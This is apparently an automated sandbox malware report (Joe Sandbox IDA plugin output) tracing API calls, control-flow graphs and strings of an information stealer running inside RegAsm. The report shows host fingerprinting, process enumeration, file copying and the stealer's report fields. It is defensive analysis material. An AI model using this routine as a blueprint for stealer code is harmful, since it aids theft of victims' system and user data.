                                                                                                                                                                                                                                          • Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 0041028C
                                                                                                                                                                                                                                          • Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 00410293
                                                                                                                                                                                                                                          • Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,014532E8), ref: 004102A7
                                                                                                                                                                                                                                          • Part of subcall function 00410C10: CreateDCA.GDI32(014532F8,00000000,00000000,00000000), ref: 00410C2A
                                                                                                                                                                                                                                          • Part of subcall function 00410C10: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410C35
                                                                                                                                                                                                                                          • Part of subcall function 00410C10: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410C40
                                                                                                                                                                                                                                          • Part of subcall function 00410C10: ReleaseDC.USER32(00000000,00000000), ref: 00410C4B
                                                                                                                                                                                                                                          • Part of subcall function 00410C10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000), ref: 00410C58
                                                                                                                                                                                                                                          • Part of subcall function 00410C10: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000,?), ref: 00410C5F
                                                                                                                                                                                                                                          • Part of subcall function 00410C10: wsprintfA.USER32 ref: 00410C6F
                                                                                                                                                                                                                                          • Part of subcall function 004103D0: GetKeyboardLayoutList.USER32(00000000,00000000,004280A7,?,?,00000001), ref: 00410417
                                                                                                                                                                                                                                          • Part of subcall function 004103D0: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410429
                                                                                                                                                                                                                                          • Part of subcall function 004103D0: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410434
                                                                                                                                                                                                                                          • Part of subcall function 004103D0: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466
                                                                                                                                                                                                                                          • Part of subcall function 004103D0: LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A
                                                                                                                                                                                                                                          • Part of subcall function 00410360: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410371
                                                                                                                                                                                                                                          • Part of subcall function 00410360: HeapAlloc.KERNEL32(00000000), ref: 00410378
                                                                                                                                                                                                                                          • Part of subcall function 00410360: GetTimeZoneInformation.KERNEL32(?), ref: 00410387
                                                                                                                                                                                                                                          • Part of subcall function 00410360: wsprintfA.USER32 ref: 004103B2
                                                                                                                                                                                                                                          • Part of subcall function 00410530: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410545
                                                                                                                                                                                                                                          • Part of subcall function 00410530: HeapAlloc.KERNEL32(00000000), ref: 0041054C
                                                                                                                                                                                                                                          • Part of subcall function 00410530: RegOpenKeyExA.KERNEL32(80000002,0145A738,00000000,00020119,00000000), ref: 0041056B
                                                                                                                                                                                                                                          • Part of subcall function 00410530: RegQueryValueExA.KERNEL32(00000000,014617D8,00000000,00000000,00000000,000000FF), ref: 00410586
                                                                                                                                                                                                                                          • Part of subcall function 004105E0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410602
                                                                                                                                                                                                                                          • Part of subcall function 004105E0: GetLastError.KERNEL32(?,?,00000001), ref: 00410610
                                                                                                                                                                                                                                          • Part of subcall function 004105E0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410648
                                                                                                                                                                                                                                          • Part of subcall function 004105E0: wsprintfA.USER32 ref: 00410692
                                                                                                                                                                                                                                          • Part of subcall function 004105A0: GetSystemInfo.KERNEL32(00000000), ref: 004105AD
                                                                                                                                                                                                                                          • Part of subcall function 004105A0: wsprintfA.USER32 ref: 004105C3
                                                                                                                                                                                                                                          • Part of subcall function 004106E0: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498), ref: 004106EE
                                                                                                                                                                                                                                          • Part of subcall function 004106E0: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498,00000000), ref: 004106F5
                                                                                                                                                                                                                                          • Part of subcall function 004106E0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410715
                                                                                                                                                                                                                                          • Part of subcall function 004106E0: wsprintfA.USER32 ref: 0041073B
                                                                                                                                                                                                                                          • Part of subcall function 00410750: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004107A7
                                                                                                                                                                                                                                          • Part of subcall function 00410750: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 00410834
                                                                                                                                                                                                                                          • Part of subcall function 00410B00: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410B4F
                                                                                                                                                                                                                                          • Part of subcall function 00410B00: Process32First.KERNEL32(00000000,00000128), ref: 00410B5F
                                                                                                                                                                                                                                          • Part of subcall function 00410B00: Process32Next.KERNEL32(00000000,00000128), ref: 00410B71
                                                                                                                                                                                                                                          • Part of subcall function 00410B00: Process32Next.KERNEL32(00000000,00000128), ref: 00410BDE
                                                                                                                                                                                                                                          • Part of subcall function 00410B00: CloseHandle.KERNEL32(00000000), ref: 00410BE9
                                                                                                                                                                                                                                          • Part of subcall function 00410860: RegOpenKeyExA.KERNEL32(00000000,01456570,00000000,00020019,00000000,004280BF,?,00000001), ref: 004108BF
                                                                                                                                                                                                                                          • Part of subcall function 00410860: RegEnumKeyExA.KERNEL32(00000000,?,?,00428524,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041091E
                                                                                                                                                                                                                                          • Part of subcall function 00410860: wsprintfA.USER32 ref: 00410947
                                                                                                                                                                                                                                          • Part of subcall function 00410860: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410965
                                                                                                                                                                                                                                          • Part of subcall function 00410860: RegQueryValueExA.KERNEL32(?,01461DB8,00000000,000F003F,?,00000400), ref: 00410995
                                                                                                                                                                                                                                          • Part of subcall function 00410860: lstrlen.KERNEL32(?), ref: 004109AA
                                                                                                                                                                                                                                          • Part of subcall function 00410860: RegQueryValueExA.KERNEL32(?,01461DD0,00000000,000F003F,?,00000400,00000000,00421E41,?,00000000,?,004280F0), ref: 00410A2E
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,00428534,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00416697
                                                                                                                                                                                                                                          • Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
                                                                                                                                                                                                                                          • Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
                                                                                                                                                                                                                                          • Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCloseCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                        • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                        • API String ID: 1864629043-4117839003
                                                                                                                                                                                                                                        • Opcode ID: 168a7b9c6228b9ebefea5874a2022edee1e1547a41af457ad248659c6c8d9d32
                                                                                                                                                                                                                                        • Instruction ID: 803c3528c2f6da264819a3d7c940b04ffa2433250a49f127d099ce38e6074702
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 168a7b9c6228b9ebefea5874a2022edee1e1547a41af457ad248659c6c8d9d32
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8921E71805249E9CB15E7A1C952BEEBBB85F29304F6440BFB50273182DE7C6B4CCA79
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1933 414650-414735 call 40fe70 * 3 call 40ff10 * 3 call 40fe80 * 6 1958 414738-41473f call 4026d0 1933->1958 1961 414745-4147e4 call 4023f0 call 40ff60 call 40ff00 call 402450 call 40fec0 * 2 call 401130 call 413d40 call 40ff60 1958->1961 1962 4147e9-414869 call 4023f0 call 402420 call 401130 call 413ea0 call 40ff60 call 40ff00 call 410120 StrCmpCA 1958->1962 2004 4148e0-4148e3 call 40ff00 1961->2004 1992 4148e8-4148fe call 410120 StrCmpCA 1962->1992 1993 41486b-4148c2 call 402450 call 40fec0 * 2 call 401130 call 413d40 1962->1993 2001 414904-41490b call 4026c0 1992->2001 2002 41550b-41561d call 40ff60 call 402450 call 40ff60 call 40ff00 call 4026e0 call 40ff60 call 40ff00 call 40fec0 * 3 call 40ff00 * 11 1992->2002 2034 4148c7-4148da call 40ff60 1993->2034 2012 414911-414918 call 4026d0 2001->2012 2013 414abe-414ad4 call 410120 StrCmpCA 2001->2013 2389 415621-415647 call 40ff00 * 2 2002->2389 2004->1992 2025 4149bf-414a3f call 402480 call 4024b0 call 401130 call 413ea0 call 40ff60 call 40ff00 call 410120 StrCmpCA 2012->2025 2026 41491e-4149ba call 402480 call 40ff60 call 40ff00 call 4024e0 call 40fec0 call 402480 call 401130 call 413d40 call 40ff60 2012->2026 2028 4153f0-415506 call 40ff60 call 4024e0 call 40ff60 call 40ff00 call 402710 call 40ff60 call 40ff00 call 40fec0 * 3 call 40ff00 * 11 2013->2028 2029 414ada-414ae1 call 4026d0 2013->2029 2025->2013 2152 414a41-414ab0 call 4024e0 call 40fec0 * 2 call 401130 call 413d40 call 40ff60 2025->2152 2207 414ab6-414ab9 call 40ff00 2026->2207 2028->2389 2044 414ae7-414aee call 4026d0 2029->2044 2045 414caa-414cc3 call 410120 StrCmpCA 2029->2045 2034->2004 2064 414af4-414b96 call 402510 call 40ff60 call 40ff00 call 402570 call 40fec0 call 402510 call 401130 call 413d40 call 40ff60 2044->2064 2065 414b9b-414c21 call 402510 call 402540 call 401130 call 413ea0 call 40ff60 call 40ff00 call 410120 StrCmpCA 2044->2065 2067 4152d2-4153eb call 40ff60 call 402570 call 40ff60 call 40ff00 call 402740 call 40ff60 call 40ff00 call 40fec0 * 3 call 40ff00 * 11 2045->2067 2068 414cc9-414cd0 call 4026d0 2045->2068 2278 414ca2-414ca5 call 40ff00 2064->2278 2065->2045 2223 414c27-414c9c call 402570 call 40fec0 * 2 call 401130 call 413d40 call 40ff60 2065->2223 2067->2389 2092 414e83-414e99 call 410120 StrCmpCA 2068->2092 2093 414cd6-414cdd call 4026d0 2068->2093 2112 4151b1-4152cd call 40ff60 call 402600 call 40ff60 call 40ff00 call 402770 call 40ff60 call 40ff00 call 40fec0 * 3 call 40ff00 * 11 2092->2112 2113 414e9f-414ea6 call 4026d0 2092->2113 2121 414ce3-414d7f call 4025a0 call 40ff60 call 40ff00 call 402600 call 40fec0 call 4025a0 call 401130 call 413d40 call 40ff60 2093->2121 2122 414d84-414e04 call 4025a0 call 4025d0 call 401130 call 413ea0 call 40ff60 call 40ff00 call 410120 StrCmpCA 2093->2122 2112->2389 2148 415065-41507b call 410120 StrCmpCA 2113->2148 2149 414eac-414eb3 call 4026d0 2113->2149 2339 414e7b-414e7e call 40ff00 2121->2339 2122->2092 2293 414e06-414e75 call 402600 call 40fec0 * 2 call 401130 call 413d40 call 40ff60 2122->2293 2191 41508d-4151ac call 40ff60 call 402690 call 40ff60 call 40ff00 call 4027a0 call 40ff60 call 40ff00 call 40fec0 * 3 call 40ff00 * 11 2148->2191 2192 41507d-415088 Sleep 2148->2192 2189 414f60-414fe6 call 402630 call 402660 call 401130 call 413ea0 call 40ff60 call 40ff00 call 410120 StrCmpCA 2149->2189 2190 414eb9-414f5b call 402630 call 40ff60 call 40ff00 call 402690 call 40fec0 call 402630 call 401130 call 413d40 call 40ff60 2149->2190 2152->2207 2189->2148 2360 414fe8-41505a call 402690 call 40fec0 * 2 call 401130 call 413d40 call 40ff60 2189->2360 2391 41505d-415060 call 40ff00 2190->2391 2191->2389 2192->1958 2207->2013 2223->2278 2278->2045 2293->2339 2339->2092 2360->2391 2391->2148
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414861
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004148F6
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 00413D40: StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0042248F), ref: 00413DB5
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414A37
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414ACC
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414C19
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414CBB
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DFC
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414E91
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414FDE
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415073
                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000EA60), ref: 00415082
                                                                                                                                                                                                                                          • Part of subcall function 00413EA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F37
                                                                                                                                                                                                                                          • Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413F4E
                                                                                                                                                                                                                                          • Part of subcall function 00413EA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00413F7A
                                                                                                                                                                                                                                          • Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413F8F
                                                                                                                                                                                                                                          • Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413FAC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                                                                        • String ID: )$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                        • API String ID: 507064821-1563971337
                                                                                                                                                                                                                                        • Opcode ID: 19e96281626953c1a908ccdd9ae1c3c26a2b4c0d6237b4cad89262f2261f7a75
                                                                                                                                                                                                                                        • Instruction ID: 16c706f6c4dd8a9781f8db293bfe0d0ce14ffdf2baf3511eb8db9a0682d00a07
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19e96281626953c1a908ccdd9ae1c3c26a2b4c0d6237b4cad89262f2261f7a75
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFA26F70C01248EACB15EBB5C9567DDBBB85F19308F5440BEE90573282EF78574CCAAA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 2728 4074e0-407518 call 4100f0 2731 4076cb-4076df call 4100f0 2728->2731 2732 40751e-407526 call 40ff10 2728->2732 2737 4076e1 2731->2737 2738 4076eb-4076f9 call 4100f0 2731->2738 2736 40752b-4075c7 call 40fe80 call 410040 call 40ff60 call 40ff00 call 4114d0 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410120 * 2 CopyFileA 2732->2736 2772 407607-40761f call 40fe80 2736->2772 2773 4075c9 2736->2773 2737->2738 2738->2736 2745 4076ff-407742 call 40ff00 * 3 call 4010c0 2738->2745 2779 407743-40782b call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 410040 call 40ff60 call 40ff00 2772->2779 2780 407625-4076c6 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 2772->2780 2774 4075d0-407605 call 40fec0 call 411aa0 call 410120 * 2 2773->2774 2774->2772 2832 40782e-40784f call 40ff00 call 410120 2779->2832 2780->2832 2846 407855-407872 2832->2846 2847 407bde-407bf0 call 410120 DeleteFileA call 4100d0 2832->2847 2853 407bc7-407bdb 2846->2853 2854 407878-40789e GetProcessHeap RtlAllocateHeap 2846->2854 2856 407bf5-407c7f call 4100d0 call 40ff00 * 9 2847->2856 2853->2847 2860 407b52-407b5f lstrlen 2854->2860 2861 4078a4-4078ac 2854->2861 2865 407b61-407ba1 lstrlen call 40fec0 call 401130 call 415650 2860->2865 2866 407bb7-407bc4 memset 2860->2866 2864 4078b0-407969 call 40fe80 * 6 call 4100f0 2861->2864 2912 407974-407979 2864->2912 2913 40796b-407972 2864->2913 2883 407ba6-407bb2 call 40ff00 2865->2883 2866->2853 2883->2866 2914 40797a-40798e call 40ff10 call 4100f0 2912->2914 2913->2914 2919 407990-407997 2914->2919 2920 407999-40799f 2914->2920 2921 4079a0-4079b5 call 40ff10 call 410110 2919->2921 2920->2921 2926 4079c4-407b4c call 410120 lstrcat * 2 call 410120 lstrcat * 2 call 410120 lstrcat * 2 call 410120 lstrcat * 2 call 410120 lstrcat * 2 call 410120 lstrcat * 2 call 4070d0 call 410120 lstrcat call 40ff00 lstrcat call 40ff00 * 6 2921->2926 2927 4079b7-4079bf call 40ff10 2921->2927 2926->2860 2926->2864 2927->2926
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 004100F0: StrCmpCA.SHLWAPI(?,00000000,?,00407516,0145F630,?,00000000,?), ref: 004100FA
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                          • Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,014625C8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 004075BF
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040787E
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 004079D1
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427AAC), ref: 004079E0
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 004079F3
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427AB0), ref: 00407A02
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00407A15
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427AB4), ref: 00407A24
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00407A37
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427AB8), ref: 00407A46
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00407A59
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427ABC), ref: 00407A68
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00407A7B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427AC0), ref: 00407A8A
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00000000), ref: 00407AD1
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(000000FF,00427AC4), ref: 00407AEE
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(000000FF), ref: 00407B56
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(000000FF), ref: 00407B65
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00407885
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: memset.MSVCRT ref: 00411AD5
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: wsprintfW.USER32 ref: 00411B1C
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
                                                                                                                                                                                                                                          • Part of subcall function 00411AA0: CloseHandle.KERNEL32(00000000), ref: 00411B93
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00407BBF
                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000,?,?,?,00427A73), ref: 00407BE7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$lstrcpy$HeapProcesslstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2944411387-0
                                                                                                                                                                                                                                        • Opcode ID: 20af6e2ebde20c0ffb83804d1d1ffadbd1ec41ee69f419b8c4d39bd494ec6aaf
                                                                                                                                                                                                                                        • Instruction ID: 3ca0864eb58e8f8aa976caedcdd73096d5702bd7c96c1b3cb961cac798526b89
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20af6e2ebde20c0ffb83804d1d1ffadbd1ec41ee69f419b8c4d39bd494ec6aaf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99327371804149EBCB14EBA5DC55BEEBB78AF19308F14416EF90273282DF786A48CB75
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 00412466
                                                                                                                                                                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 004124F3
                                                                                                                                                                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00412530
                                                                                                                                                                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00412579
